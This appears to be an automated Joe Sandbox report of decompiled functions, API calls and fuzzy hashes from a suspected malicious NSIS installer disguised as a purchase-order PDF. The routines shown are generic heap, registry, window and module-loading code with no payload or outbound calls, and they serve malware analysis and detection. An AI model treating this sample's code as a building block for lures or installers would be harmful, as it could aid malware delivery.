COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E1000454D(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x1000bf00, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x1000c810 - _t7;
								if(__eflags == 0) {
									_t9 = E10003A67(__eflags);
									 *_t9 = E10003A7A(GetLastError());
									goto L17;
								} else {
									__eflags = E10003D9F(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E10003A67(__eflags);
										 *_t12 = E10003A7A(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E10003D9F(_t6, _t31);
						 *((intOrPtr*)(E10003A67(__eflags))) = 0xc;
						goto L12;
					} else {
						E10002511(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E100044BB(__ebx, __edx, __edi, _a8);
				}
			}

0x10004554
0x10004562
0x10004565
0x10004567
0x10004576
0x100045a9
0x100045a9
0x100045ac
0x00000000
0x00000000
0x10004579
0x1000457b
0x1000457d
0x1000457d
0x1000457d
0x1000458a
0x10004590
0x10004592
0x10004594
0x100045f4
0x100045f4
0x10004596
0x10004596
0x1000459c
0x100045de
0x100045f2
0x00000000
0x1000459e
0x100045a5
0x100045a7
0x100045c6
0x100045da
0x100045c0
0x100045c0
0x100045c0
0x00000000
0x00000000
0x00000000
0x100045a7
0x1000459c
0x00000000
0x100045c2
0x100045af
0x100045ba
0x00000000
0x10004569
0x1000456c
0x10004572
0x10004572
0x100045c3
0x100045c5
0x10004556
0x10004560
0x10004560

APIs

_malloc.LIBCMT ref: 10004559

Part of subcall function 100044BB: __FF_MSGBANNER.LIBCMT ref: 100044D2
Part of subcall function 100044BB: __NMSG_WRITE.LIBCMT ref: 100044D9
Part of subcall function 100044BB: HeapAlloc.KERNEL32(00570000,00000000,00000001,00000000,?,00000000,?,10002780,?,?,?,?,?,10002AFE,00000018,10009B80), ref: 100044FE

_free.LIBCMT ref: 1000456C

Memory Dump Source

Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 79715a70deefa15e6e5ea9d46a0df7f71a35c20fbb44ae7ad5dd88d8a19d84a4
Instruction ID: 19cb2b43c1f7cb45267d19525e7b4d124c53bcd19f4e80a8a756fb5b7eef4191
Opcode Fuzzy Hash: 79715a70deefa15e6e5ea9d46a0df7f71a35c20fbb44ae7ad5dd88d8a19d84a4
Instruction Fuzzy Hash: A411EBB2904F26AFFB21DF74AC4574E37C8EF002E1F128525F9488615EDF349A408699

Uniqueness

Uniqueness Score: -1.00%

Function 1000323D Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E1000323D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x10009bc0);
				E10002840(__ebx, __edi, __esi);
				_t31 = E100018F4(__edx, __edi, _t35);
				_t25 =  *0x1000be10; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E10002A35(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x1000b4c4; // 0x1000b7c0
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x1000b7c0;
								if(__eflags != 0) {
									E10002511(_t33);
								}
							}
						}
						_t20 =  *0x1000b4c4; // 0x1000b7c0
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x1000b4c4; // 0x1000b7c0
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E100032D9();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E10001C09(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E10002885(_t33);
			}

0x1000323d
0x1000323d
0x1000323d
0x1000323d
0x1000323f
0x10003244
0x1000324e
0x10003250
0x10003259
0x1000327a
0x10003280
0x10003284
0x10003287
0x1000328a
0x10003290
0x10003292
0x10003294
0x1000329d
0x1000329f
0x100032a1
0x100032a7
0x100032aa
0x100032af
0x100032a7
0x1000329f
0x100032b0
0x100032b5
0x100032b8
0x100032be
0x100032c2
0x100032c2
0x100032c8
0x100032cf
0x10003261
0x10003261
0x10003261
0x10003264
0x10003266
0x1000326a
0x1000326f
0x10003277

APIs

Part of subcall function 100018F4: __getptd_noexit.LIBCMT ref: 100018F5
Part of subcall function 100018F4: __amsg_exit.LIBCMT ref: 10001902

__amsg_exit.LIBCMT ref: 1000326A
__lock.LIBCMT ref: 1000327A
InterlockedDecrement.KERNEL32(?), ref: 10003297
_free.LIBCMT ref: 100032AA
InterlockedIncrement.KERNEL32(1000B7C0), ref: 100032C2

Memory Dump Source

Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 1231874560-0
Opcode ID: 6560743187c80d76e2a816ea093f7de185fdedfc0b6097cbaa1231269ae894d6
Instruction ID: b3878dd355b614d152379542394d216700b7b41a6a0363afd7efb2b57158836b
Opcode Fuzzy Hash: 6560743187c80d76e2a816ea093f7de185fdedfc0b6097cbaa1231269ae894d6
Instruction Fuzzy Hash: 78015E35901A21ABFA42DB64894674F77A4FF047D1F11C149E80467299CB346A41CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 004066A5: lstrcatW.KERNEL32(Fosklcks,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Fosklcks,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				char _t27;
				int _t30;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2);
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
					}
					if(_t37 == 4) {
						_t27 = E00402D84(3);
						_pop(_t32);
						 *0x40b5f8 = _t27;
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024e5
0x004024ea
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp
API String ID: 2655323295-2517040147
Opcode ID: 2c9c4c0baa2399e38114195eed6ba3c931801a1fff8a52bb7ff1bd283087c782
Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
Opcode Fuzzy Hash: 2c9c4c0baa2399e38114195eed6ba3c931801a1fff8a52bb7ff1bd283087c782
Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658

Uniqueness

Uniqueness Score: -1.00%

Function 0040603F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x0040604b
0x00406056
0x0040605a
0x00406061
0x0040606d
0x0040607d
0x0040607f
0x00406097
0x00406098
0x0040609f
0x004060a0
0x00000000
0x00000000
0x00406083
0x0040608a
0x00406092
0x00000000
0x00000000
0x00000000
0x00000000
0x0040608a
0x004060a2
0x00000000
0x004060b6
0x0040606f
0x00406075
0x00000000
0x00000000
0x00000000
0x00000000
0x00406075
0x0040605c
0x00000000

APIs

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4Tu.Tu,?,75542EE0,00405D94,?,75543420,75542EE0,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50, 4Tu.Tu,?,75542EE0,00405D94,?,75543420,75542EE0,00000000), ref: 00406098
GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50, 4Tu.Tu,?,75542EE0,00405D94,?,75543420,75542EE0), ref: 004060A8

Strings

4Tu.Tu, xrefs: 00406041
P_B, xrefs: 00406045

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4Tu.Tu$P_B
API String ID: 3248276644-2825032643
Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E

Uniqueness

Uniqueness Score: -1.00%

Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406544
0x00406546
0x0040655b
0x0040655e
0x00406563
0x00406568
0x004065a6
0x004065a6
0x0040656a
0x0040657c
0x00406587
0x0040658d
0x00406598
0x00000000
0x00000000
0x00406598
0x004065ac

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,Fosklcks,?,?,0040679D,80000002), ref: 0040657C
RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Fosklcks,Fosklcks,Fosklcks,00000000,00422728), ref: 00406587

Strings

Fosklcks, xrefs: 0040653D
('B, xrefs: 0040655B

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CloseQueryValue
String ID: ('B$Fosklcks
API String ID: 3356406503-169972850
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10001000 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10001000() {
				char _v8;
				_Unknown_base(*)()* _v12;

				_v8 = 0;
				_v12 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "GetModuleHandleExW");
				_v12(6, E10001000,  &_v8);
				return _v8;
			}

0x10001006
0x10001024
0x10001032
0x1000103b

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll,GetModuleHandleExW), ref: 10001017
GetProcAddress.KERNEL32(00000000), ref: 1000101E

Strings

Kernel32.dll, xrefs: 10001012
GetModuleHandleExW, xrefs: 1000100D

Memory Dump Source

Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetModuleHandleExW$Kernel32.dll
API String ID: 1646373207-332549961
Opcode ID: 78ecdb18c8cf1155b803042e0fd8ea9a7357a6dfbe6600d3dc8cc484a1e9cb8c
Instruction ID: 63f985a6f37cd22edcfa9ef1cf1702fe9c8e286a4ec36befd3c37240eef0757d
Opcode Fuzzy Hash: 78ecdb18c8cf1155b803042e0fd8ea9a7357a6dfbe6600d3dc8cc484a1e9cb8c
Instruction Fuzzy Hash: F6E0EC7580020CFBEB10EFE48D4DBDEBB78EB04391F204191FA45A2248D7706B589BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10001ABA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 16%

			E10001ABA(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}

0x10001abe
0x10001ac9
0x10001ad1
0x10001adb
0x10001ae3
0x00000000
0x10001ae8
0x10001ae3
0x10001aeb

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10001AF7,?,?,100044E8,000000FF,0000001E,00000000,?,00000000,?,10002780), ref: 10001AC9
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10001ADB

Strings

mscoree.dll, xrefs: 10001AC2
CorExitProcess, xrefs: 10001AD3

Memory Dump Source

